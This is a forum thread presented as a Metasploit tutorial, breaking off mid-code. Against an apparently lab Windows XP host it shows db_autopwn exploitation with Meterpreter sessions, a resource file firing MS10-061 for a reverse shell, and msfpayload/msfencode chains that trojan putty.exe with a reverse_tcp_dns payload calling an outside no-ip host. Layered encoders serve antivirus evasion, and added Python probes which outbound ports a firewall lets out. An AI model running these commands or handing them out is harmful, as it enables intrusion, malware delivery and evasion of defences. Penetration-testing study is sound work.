Re: My Metasploit tutorial thread
Code:
msf > db_nmap -A 192.168.25.147
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
Nmap scan report for victim-30fe648f (192.168.25.147)
Host is up (0.00074s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp closed icslap
MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP3
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: MSHOME\VICTIM-30FE648F
|_ System time: 2010-11-18 08:56:26 UTC-8
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms victim-30fe648f (192.168.25.147)
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds
Then, we check it, and maybe take a look at the open services.
Code:
msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
Hosts
=====
address mac name state updated_at svcs vulns
------- --- ---- ----- ---------- ---- -----
192.168.25.147 08:00:27:C1:63:8C victim-30fe648f alive 2010-11-18 15:34:25 UTC 3 0
msf > db_services
Services
========
created_at info name port proto state updated_at Host Workspace
---------- ---- ---- ---- ----- ----- ---------- ---- ---------
2010-11-18 15:34:26 UTC netbios-ssn 139 tcp open 2010-11-18 15:34:26 UTC 192.168.25.147 default
2010-11-18 15:34:26 UTC Microsoft Windows XP microsoft-ds microsoft-ds 445 tcp open 2010-11-18 15:34:26 UTC 192.168.25.147 default
2010-11-18 15:34:26 UTC icslap 2869 tcp closed 2010-11-18 15:34:26 UTC 192.168.25.147 default
We'll go ahead and run our db_autopwn now.
Code:
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
[*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
[*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
[*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
[*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
[*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...
..continued..
Re: My Metasploit tutorial thread
OK, now we've run our db_autopwn and managed to snag some sessions. Let's look at what hosts were exploited, and which exploits worked. I'm going to show a few methods to achieve this.
Code:
msf > db_vulns
[*] Time: 2010-11-18 15:57:36 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms08_067_netapi refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-11-18 15:58:05 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms10_061_spoolss refs=OSVDB-67988,CVE-2010-2729,MSB-MS10-061
msf > db_exploited
[*] Time: 2010-11-18 15:57:38 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:57:41 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:58:05 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms10_061_spoolss
[*] Time: 2010-11-18 15:58:06 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms10_061_spoolss
[*] Found 4 exploited hosts.
msf > sessions -v
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:11425 -> 192.168.25.147:1039 exploit/windows/smb/ms08_067_netapi
2 meterpreter x86/win32 192.168.25.133:32002 -> 192.168.25.147:1040 exploit/windows/smb/ms08_067_netapi
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:15606 -> 192.168.25.147:1042 exploit/windows/smb/ms10_061_spoolss
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ VICTIM-30FE648F 192.168.25.133:11361 -> 192.168.25.147:1043 exploit/windows/smb/ms10_061_spoolss
You should even be able to run scripts on multiple sessions with the following; in this example we'll use checkvm. I wasn't able to get all sessions to run some scripts, so I will not be including the output in this case. Perhaps a better idea would be to use setg with an InitialAutoRunScript setting.
Code:
msf > sessions -s checkvm all
I think that should cover most of the basics for db_autopwn. It's quite handy and entertaining to mess around with. I also recommend checking out Rel1k's fast-track tool.
I have recorded a short demo video of some commands and will be uploading shortly.
EDIT:
Here is my quick db_autopwn vid
I am still working on optimal settings to use for the recordings and also my video editing skills. These are in real time so there might be a couple of points where you'd want to skip ahead a bit.
Re: My Metasploit tutorial thread
One thing I believe needs to be mentioned, which I neglected previously with db_autopwn: without first performing a vulnerability scan, such as with Nessus, db_autopwn run against matched ports will run far too many exploits that are not compatible with the platform/target.
In the previous example we can see we are running Linux exploits against a Windows box.
Quote:
msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
This can easily be remedied with the -m flag. -m uses regular expressions to narrow the list. Yes, we could import a Nessus scan, which is great, but the -m option is a solution that will take very little time.
Code:
msf > db_autopwn -p -r -e -m windows
This results in 18 fewer exploits to run that are not needed, making the process faster.
Much nicer...
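The module selection and the session bookkeeping shown in the db_autopwn posts above, replayed offline as an added example. This is my code, not iproute's and not part of the Metasploit Framework: it re-parses the "Launching <module> against <host>:<port>" lines that `db_autopwn -p` prints and applies a module-name regex the way `-m <regex>` does, so you can see which modules a given regex would drop before launching anything. The transcript it parses is reconstructed from the post's own output (the same 25 modules against 139 and 445, plus the four session lines); Python's `re.search` stands in for the Ruby regex match the console uses, and nothing here touches a target.

```python
"""Offline replay of db_autopwn's module list and the -m name filter (added example)."""
import re
from collections import Counter

# The 25 modules db_autopwn -p matched for ports 139/445 in the post.
MODULES = [
    "exploit/freebsd/samba/trans2open",
    "exploit/linux/samba/chain_reply",
    "exploit/linux/samba/lsa_transnames_heap",
    "exploit/linux/samba/trans2open",
    "exploit/multi/samba/nttrans",
    "exploit/multi/samba/usermap_script",
    "exploit/netware/smb/lsass_cifs",
    "exploit/osx/samba/lsa_transnames_heap",
    "exploit/solaris/samba/trans2open",
    "exploit/windows/brightstor/ca_arcserve_342",
    "exploit/windows/brightstor/etrust_itm_alert",
    "exploit/windows/smb/ms03_049_netapi",
    "exploit/windows/smb/ms04_011_lsass",
    "exploit/windows/smb/ms04_031_netdde",
    "exploit/windows/smb/ms05_039_pnp",
    "exploit/windows/smb/ms06_040_netapi",
    "exploit/windows/smb/ms06_066_nwapi",
    "exploit/windows/smb/ms06_066_nwwks",
    "exploit/windows/smb/ms06_070_wkssvc",
    "exploit/windows/smb/ms07_029_msdns_zonename",
    "exploit/windows/smb/ms08_067_netapi",
    "exploit/windows/smb/ms10_061_spoolss",
    "exploit/windows/smb/netidentity_xtierrpcpipe",
    "exploit/windows/smb/psexec",
    "exploit/windows/smb/timbuktu_plughntcommand_bof",
]
TARGET = "192.168.25.147"

def reconstructed_log():
    """Rebuild the console transcript from the post (constructed sample data)."""
    lines, n = [], 0
    for port in (139, 445):
        for mod in MODULES:
            n += 1
            lines.append(f"[*] ({n}/50 [0 sessions]): Launching {mod} against {TARGET}:{port}...")
    lines += [
        "[*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600",
        "[*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600",
        "[*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600",
        "[*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600",
    ]
    return lines

LAUNCH_RE = re.compile(r"Launching (?P<module>\S+) against (?P<host>[\d.]+):(?P<port>\d+)")
SESSION_RE = re.compile(r"(?P<kind>\w+) session (?P<sid>\d+) opened "
                        r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)")

def parse_launches(lines):
    """(module, host, port) for every module db_autopwn launched."""
    out = []
    for line in lines:
        m = LAUNCH_RE.search(line)
        if m:
            out.append((m["module"], m["host"], int(m["port"])))
    return out

def parse_sessions(lines):
    """{session_id: (kind, rhost, rport)} from the 'session N opened' lines."""
    out = {}
    for line in lines:
        m = SESSION_RE.search(line)
        if m:
            out[int(m["sid"])] = (m["kind"], m["rhost"], int(m["rport"]))
    return out

def apply_module_regex(launches, pattern):
    """Keep only launches whose module name matches `pattern`, as -m <regex> does."""
    rx = re.compile(pattern)
    return [l for l in launches if rx.search(l[0])]

def platform_of(module):
    """exploit/<platform>/... -> 'windows', 'linux', 'multi', ..."""
    return module.split("/")[1]

def summarize(lines, pattern):
    launches = parse_launches(lines)
    kept = apply_module_regex(launches, pattern)
    dropped = [l for l in launches if l not in kept]
    return {
        "launched": len(launches),
        "kept": len(kept),
        "dropped": len(dropped),
        "dropped_platforms": Counter(platform_of(l[0]) for l in dropped),
        "sessions": len(parse_sessions(lines)),
    }

if __name__ == "__main__":
    s = summarize(reconstructed_log(), "windows")
    print(f"{s['launched']} launched; -m windows keeps {s['kept']}, drops {s['dropped']} "
          f"{dict(s['dropped_platforms'])}; {s['sessions']} sessions opened")
```

Two things worth noticing when you try other patterns: `-m windows` also drops the `multi/samba` modules, which are irrelevant to an XP box anyway, and a looser pattern such as `smb` keeps `netware/smb/lsass_cifs` because the match is against the whole module path, not the platform.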
Re: My Metasploit tutorial thread
Quote:
Originally Posted by iproute
I'll give some info on my take on it in another post when I've got more time, but I'm definitely not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.
On another note, one of the things I feel I've missed above, links-wise, is
IHS | Home of Johnny Long and Hackers for Charity, Inc
Please at least take a look at some of the cool stuff Johnny Long is doing.
About the firewall bypass, check out FWB++ at Megapanzer FWB++. Currently the binary just connects to the megapanzer RAT's webpage, but since the source is provided we can change the link to our IP, I guess.
Did anyone have any success by using meterpreter egress buster or reverse DNS?
Re: My Metasploit tutorial thread
Here is my take on firewall bypass. Again, I am no expert.
For local firewall bypass (Windows Firewall) I'd be assuming you're on the same subnet as the victim machine, but the local firewall is preventing bind_tcp payloads. Of course in this instance we would just use a reverse_tcp payload.
For NAT traversal/bypass we can assume you would not be on the same subnet as the victim machine. In which case you might hope for open ports of some kind. If the victim machine is totally inaccessible through the NAT, then I might be thinking about using a social engineering attack with a reverse_tcp_dns payload, and point it back to myself with my no-ip hostname or some such. Granted you would need some mechanism to deliver your crafted payload, such as email or SMS, and would also of course need to know WHERE to send it. Hopefully enough time has been spent on the information gathering/enumeration phase of the pentest.
Or you could consider attacking the network equipment first. Suppose you could compromise the router first. Well, now you have the keys to the kingdom. Maybe modify the DHCP server so that it is handing out your IP as a DNS server, and direct people wherever we like. Some routers can set specific records for specific websites, such as 2wire equipment. Maybe the router is capable of a VPN setup that could place us on the same inside subnet as our victim machine (this is pivoting), and then all we'd have to deal with is the local firewall of the victim machine.
Another thing to keep in mind with a corporate network scenario. There is often a proxy server limiting outbound traffic making the reverse_tcp and or reverse_tcp_dns payloads more difficult to utilize. The one at my work for instance limits everything except 80, 443, 22 and a few others. Things that we would definitely be using in our jobs. Because of these common proxy configurations I like to set my reverse_tcp or reverse_tcp_dns payloads to 443 or another port that is commonly open for users.
There is now a very interesting payload in the framework that might be very useful for this situation. I have never used it myself; however, here is the info from it.
Code:
msf > info windows/meterpreter/reverse_tcp_allports
Name: Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
Version: 10394, 8998, 8984
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 294
Rank: Normal
Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
hdm <hdm@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 1 yes The starting port number to connect back on
Description:
Try to connect back to the attacker, on all possible ports (1-65535,
slowly), Inject the meterpreter server DLL via the Reflective Dll
Injection payload (staged)
Regarding A/V bypass, I strongly recommend that interested parties do some reading on this forum. There is a lot of information just in the HowTo section here. Of course we'll need to use encoding. Encoding can be set inside of the exploit module, or if you are generating a payload with msfpayload, you can pipe it through msfencode, even multiple times, like this:
Code:
root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-ip-hostname.com LPORT=443 R | \
  msfencode -e x86/fnstenv_mov -c 2 -t raw | \
  msfencode -e x86/countdown -c 3 -t raw | \
  msfencode -e x86/call4_dword_xor -c 1 -t raw | \
  msfencode -t raw | \
  msfencode -e x86/shikata_ga_nai -c 4 -t exe > /root/payload.exe
Don't forget you can use/backdoor an existing exe (some will not work; experimentation is key) as a template with -x. You can even keep the template working with -k, so when they run the payload exe, their expected program starts up just fine. Remember to use the -o option with these for your output file rather than redirecting the output. You can also set things up with
Code:
root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-ip-hostname.com LPORT=443 EXITFUNC=thread R | msfenco......etc...
which will keep your meterpreter/payload process alive even when they close the backdoored executable.
There is also more than one way to generate payloads. You can do so within the framework. Here is how:
Code:
msf > use windows/meterpreter/reverse_tcp_dns
msf payload(reverse_tcp_dns) > set lhost your-noip-hostname.com
lhost => your-noip-hostname.com
msf payload(reverse_tcp_dns) > set lport 443
lport => 443
msf payload(reverse_tcp_dns) > set exitfunc thread
exitfunc => thread
msf payload(reverse_tcp_dns) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-x <opt> The executable template to use
msf payload(reverse_tcp_dns) > generate -e x86/shikata_ga_nai -i 3 -t exe -x /root/putty.exe -k -f /root/payload.exe
If you do not use the -t option it will generate shellcode by default. Bear in mind, staged payloads such as meterpreter will output shellcode for both stages.
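An ordered egress probe, added here as an example alongside the reverse_tcp_allports and outbound-proxy discussion above. This is my code, not iproute's and not part of the Metasploit Framework. reverse_tcp_allports walks ports 1 through 65535 in order, which is slow when the one allowed port is 443; this probe does the victim-side part of the same idea but tries a short list of ports a proxy commonly permits first, so you learn which outbound ports get through before you pick LPORT. `LIKELY_ALLOWED` is my guess at that list, and `start_listener` / `reserve_closed_port` are test fixtures so the demo runs against 127.0.0.1 offline; against a real egress filter you would point `host` at a box you control that listens on every port in the list.

```python
"""Egress probe that tries likely-allowed outbound ports first (added example)."""
import socket

# Constructed ordering: ports a corporate proxy is most likely to let out, first.
LIKELY_ALLOWED = [443, 80, 22, 53, 8080, 8443]

def classify_port(host, port, timeout=0.5):
    """'open' if the TCP handshake completes, 'refused' on a RST, 'filtered' on timeout.

    A timeout is what a silently dropping firewall or proxy looks like; a RST
    usually means the path is open but nothing is listening on that port.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as c:
        c.settimeout(timeout)
        try:
            c.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "refused"
        except socket.timeout:
            return "filtered"
        except OSError as e:
            return f"error:{e.errno}"

def probe_ports(host, ports, timeout=0.5):
    """{port: classification} for every port in the list, in the order given."""
    return {p: classify_port(host, p, timeout) for p in ports}

def first_egress_port(host, ports, timeout=0.5):
    """First port that completes a handshake, or None; stops at the first hit."""
    for p in ports:
        if classify_port(host, p, timeout) == "open":
            return p
    return None

# --- local fixtures so the demo runs offline (no real target involved) -------
def start_listener(host="127.0.0.1"):
    """Listening socket on an ephemeral port; stands in for the attacker's handler."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, 0))
    s.listen(5)
    return s, s.getsockname()[1]

def reserve_closed_port(host="127.0.0.1"):
    """Bound but never listen()ed: the kernel answers SYNs with RST, i.e. 'refused'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    return s, s.getsockname()[1]

if __name__ == "__main__":
    lsock, open_port = start_listener()
    csock, closed_port = reserve_closed_port()
    order = [closed_port] + LIKELY_ALLOWED + [open_port]
    print(probe_ports("127.0.0.1", order))
    print("first usable egress port:", first_egress_port("127.0.0.1", order))
    lsock.close()
    csock.close()
```

On the handler side the catch is that a payload connecting back to an arbitrary port needs something listening on every port it might try; on a Linux attacker box the usual trick is to NAT the whole range to one handler, for example `iptables -t nat -A PREROUTING -p tcp --dport 1:65535 -j REDIRECT --to-ports 4444`, and run a single multi/handler on 4444.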
Re: My Metasploit tutorial thread
Here I'm going to mention resource files briefly. Specifically I would like to address the default resource file. I will demonstrate regular resource file usage when I have more time, but here is a cool bit.
Using the default msf resource file you can set certain commands to run on console startup. Perhaps we would like to have our postgres database autoconnect when we start things up.
Code:
root@bt:~# nano .msf3/msfconsole.rc
Go ahead and enter the commands you would like to run on startup. You can even do things like calling other resource files.
Code:
db_connect postgres:password@127.0.0.1/metasploit
db_status
Then when starting the framework it should look something like this:
Code:
root@bt:~# msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 633 exploits - 312 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11229 updated today (2010.12.05)
resource (/root/.msf3/msfconsole.rc)> db_connect postgres:password@127.0.0.1/metasploit
resource (/root/.msf3/msfconsole.rc)> db_status
[*] postgresql connected to metasploit
msf >
Here I will show making msfconsole into an instant shell. We will call a resource file from the default msfconsole.rc file.
This is a resource file I made with the makerc command in the framework.
Code:
root@bt:~# cat spoolss.rc
use windows/smb/ms10_061_spoolss
set rhost 192.168.25.147
set payload windows/shell/reverse_tcp
set lhost 192.168.25.106
set lport 5566
exploit
And here is what I added to my msfconsole.rc file
Code:
root@bt:~# cat .msf3/msfconsole.rc
db_connect postgres:severus@127.0.0.1/metasploit
db_status
resource spoolss.rc
which results in
Code:
root@bt:~# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 633 exploits - 312 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11229 updated today (2010.12.05)
resource (/root/.msf3/msfconsole.rc)> db_connect postgres:severus@127.0.0.1/metasploit
resource (/root/.msf3/msfconsole.rc)> db_status
[*] postgresql connected to metasploit
resource (/root/.msf3/msfconsole.rc)> resource spoolss.rc
resource (spoolss.rc)> use windows/smb/ms10_061_spoolss
resource (spoolss.rc)> set rhost 192.168.25.147
rhost => 192.168.25.147
resource (spoolss.rc)> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
resource (spoolss.rc)> set lhost 192.168.25.106
lhost => 192.168.25.106
resource (spoolss.rc)> set lport 5566
lport => 5566
resource (spoolss.rc)> exploit
[*] Started reverse handler on 192.168.25.106:5566
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\192.168.25.147\Lexmark1 ...
[*] Printer handle: 0000000092e4d269f911344c9b69d159ed732a4e
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\7FnILYxzIVvGR1.exe
[*] Job started: 0x5
[*] Wrote bind request for \\192.168.25.147\PIPE\ATSVC (72 bytes)
[*] Wrote 96 bytes of NetrAddJob request
[*] Everything should be set, waiting up to two minutes for a session...
[*] Sending stage (240 bytes) to 192.168.25.147
[*] Command shell session 1 opened (192.168.25.106:5566 -> 192.168.25.147:1036) at Sun Dec 05 20:09:00 -0600 2010
C:\WINDOWS\system32>
An alternative, of course, to including the spoolss.rc in the default resource file is to just start the console with the -r flag, such as:
Code:
root@bt:~# msfconsole -r spoolss.rc
I am using a windows/shell payload for simplicity and speed in this case. Also this brief bit on resource files is simply designed to illustrate some of the methodology that can be used.
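A small resource-file expander, added as an example for the post above; it is my code, not iproute's and not part of the Metasploit Framework. The post chains msfconsole.rc to `resource spoolss.rc` to `exploit`, which is convenient and also means the console fires whatever that chain resolves to the moment it starts. This helper flattens nested `resource <file>` lines into the final command list and runs a few sanity checks on it, so you can review what will run (and catch a file that includes itself, or one that is missing) without launching msfconsole. `FILES` is an in-memory copy of the two files from the post; the bare-name lookup relative to `/root` mirrors what the post's transcript shows, and the `#`-comment skipping is a convenience of this example rather than something the page documents about the console.

```python
"""Flatten nested msfconsole resource files and sanity-check them (added example)."""
import ipaddress

# Constructed in-memory copies of the two files shown in the post.
FILES = {
    "/root/.msf3/msfconsole.rc": (
        "db_connect postgres:severus@127.0.0.1/metasploit\n"
        "db_status\n"
        "resource spoolss.rc\n"
    ),
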